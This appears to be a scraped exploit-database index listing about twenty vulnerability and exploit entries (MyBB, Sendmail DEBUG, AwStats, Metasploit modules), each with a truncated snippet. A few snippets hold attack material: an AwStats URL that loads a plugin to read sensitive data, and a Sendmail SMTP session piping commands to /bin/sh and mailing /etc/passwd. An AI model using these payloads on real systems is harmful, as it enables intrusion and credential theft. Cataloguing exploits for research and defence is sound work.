MyBulletinBoard (MyBB) <= 1.2.3 - Remote Code Execution Exploit

No description provided by source. !/usr/bin/php ?php errorreportingEALL ^ ENOTICE; http://www.milw0rm.com/exploits/2012 They corrected not all a lot of SQL requests which use the ipaddress, with $db-escapestring. They don't corrected the function this is a choice ... the bad and they forgot to...

MS Windows 2000 Debug Registers Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/2764/info A vulnerability exists in the handling of debug registers in Windows 2000. It is possible for unprivileged processes to create breakpoints for arbitrary processes. This can be used to 'kill' arbitrary processes...

CDRTools 2.0 RSCSI Debug File Arbitrary Local File Manipulation Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/8328/info It has been reported that the rscsi utility may provide for the modification of ownership and the corruption of arbitrary attacker specified files. It has been reported that a local attacker may invoke the rscsi...

AwStats <= 6.4 - Denial of Service

No description provided by source. !/usr/bin/perl Summarized the advisory www.ghc.ru GHC: /str0ke 0 Exploitable example raw log plugin: Attacker can read sensitive information http://server/cgi-bin/awstats-6.4/awstats.pl?pluginmode=rawlog&loadplugin=rawlog 1 Perl code execution. This script...

Revize CMS Query_results.JSP SQL Injection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/15481/info Revize CMS is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitation could...

Crysis <= 1.1.1.5879 Remote Format String Denial of Service PoC

No description provided by source. The Crysis engine passes along internal debug strings through the game. One of them is passed to vsprintf in the crt lib: 30503263 8D8C24 10100000 LEA ECX,DWORD PTR SS:ESP+1010 3050326A 51 PUSH ECX 3050326B 50 PUSH EAX 3050326C 8D5424 08 LEA EDX,DWORD PTR SS:ESP...

Agora.CGI 3/4 Debug Mode Path Disclosure Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/3976/info Agora.cgi is a freely available, open source shopping cart system. When debug mode is enabled, it is possible for a remote attacker to display the absolute path to the directory that the agora.cgi script is stor...

TCLHttpd 3.4.2 - Multiple Cross-Site Scripting Vulnerabilities

No description provided by source. source: http://www.securityfocus.com/bid/8688/info It has been reported that several of the modules included with TCLHTtpd are vulnerable to cross-site scripting attacks. According to the report, the Status, Debug, Mail and Admin modules are affected by these...

Joomla Component Answers 2.3beta - Multiple Vulnerabilities

No description provided by source. Exploit Title: Joomla Component Answers v2.3beta Multiple Vulnerabilities Date: 25 May 2010 Author: jdc Software Link: http://extensions.joomla.org/extensions/communication/forum/12652 Version: 2.3beta Tested on: PHP5, MySQL5 Blind SQL Injection...

Invision Power Board <= 2.0.3 Login.PHP SQL Injection Exploit

No description provided by source. !/usr/bin/perl -w This one actually works : Just paste the outputted cookie into your request header using livehttpheaders or something and you will probably be logged in as that user. No need to decrypt it! Exploit coded by Tony Little Lately and Petey Beege us...

Tor < 0.1.2.16 ControlPort Remote Rewrite Exploit

No description provided by source. !-- Tor 0.1.2.16 with ControlPort enabled not default Exploit for Tor ControlPort torrc Rewrite Vulnerability http://secunia.com/advisories/26301 Rewrites the torrc to log to a different location: C:\Documents and Settings\All Users\Start...

Microsoft SQL Server Payload Execution via SQL injection

No description provided by source. $Id: mssqlpayloadsqli.rb 11730 2011-02-08 23:31:44Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms o...

ngIRCd <= 0.8.2 - Remote Format String Exploit

No description provided by source. / ngircdfsexp.c ngIRCd = 0.8.2 remote format string exploit Note: To obtain a successful exploitation, we need that ngIRCd has been compiled with IDENT, logging to SYSLOG and DEBUG enabled. Original Reference: http://www.nosystem.com.ar/advisories/advisory-11.tx...

Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit

No description provided by source. / \ exploit code for modgzip with debugmode = 1.2.26.1a / \ Created by xCrZx crazyeinstein yahoo com /05.06.03/ / \ Tested on RedHat 8.0 Psyche here is target for it, / also tested on FreeBSD 4.7 1.3.19.2a here is no target for it : / \ / / \ / Single mode: \ /...

IBM AIX 5.6/6.1 - _LIB_INIT_DBG Arbitrary File Overwrite via Libc Debug

No description provided by source. !/bin/sh $Id: raptorlibC,v 1.1 2009/09/10 15:08:04 raptor Exp $ raptorlibC - AIX arbitrary file overwrite via libC debug Copyright c 2009 Marco Ivaldi [email protected] Property of @ Mediaservice.net Srl Data Security Division http://www.mediaservice.net/...

Berkeley Sendmail 5.58 DEBUG Vulnerability

No description provided by source. 220 mail.victim.com SMTP helo attacker.com 250 Hello attacker.com, pleased to meet you. debug 200 OK mail from: /dev/null 250 OK rcpt to:|sed -e '1,/^$/'d | /bin/sh ; exit 0 250 OK data 354 Start mail input; end with CRLF.CRLF mail [email protected] /etc/passwd...

Portable UPnP SDK unique_service_name() Remote Code Execution

No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3...

Motorola SB5101 Hax0rware Event Reset Remote Overflow

No description provided by source. !/usr/bin/perl Motorola SB5101 Hax0rware Event Reset Remote Overflow Tested on Hax0rware 1.1 R30, R32 and R39 Author: Dillon Beresford Date: 6/6/2010 Vendor: Motorola Corporation and SBHacker SBHacker has been notified of the vuln . Software Link:...

Java Debug Wire Protocol Remote Code Execution

No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::EXE...

Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit

No description provided by source. ?php / Debug Mode password change vulnerability Affects Invision Power Borard 2.0.0 to 2.1.7 by Rapigator This works if: Debug Level is set to 3 or Enable SQL Debug Mode is turned on In General Configuration of the forum software. / // The forum's address up to...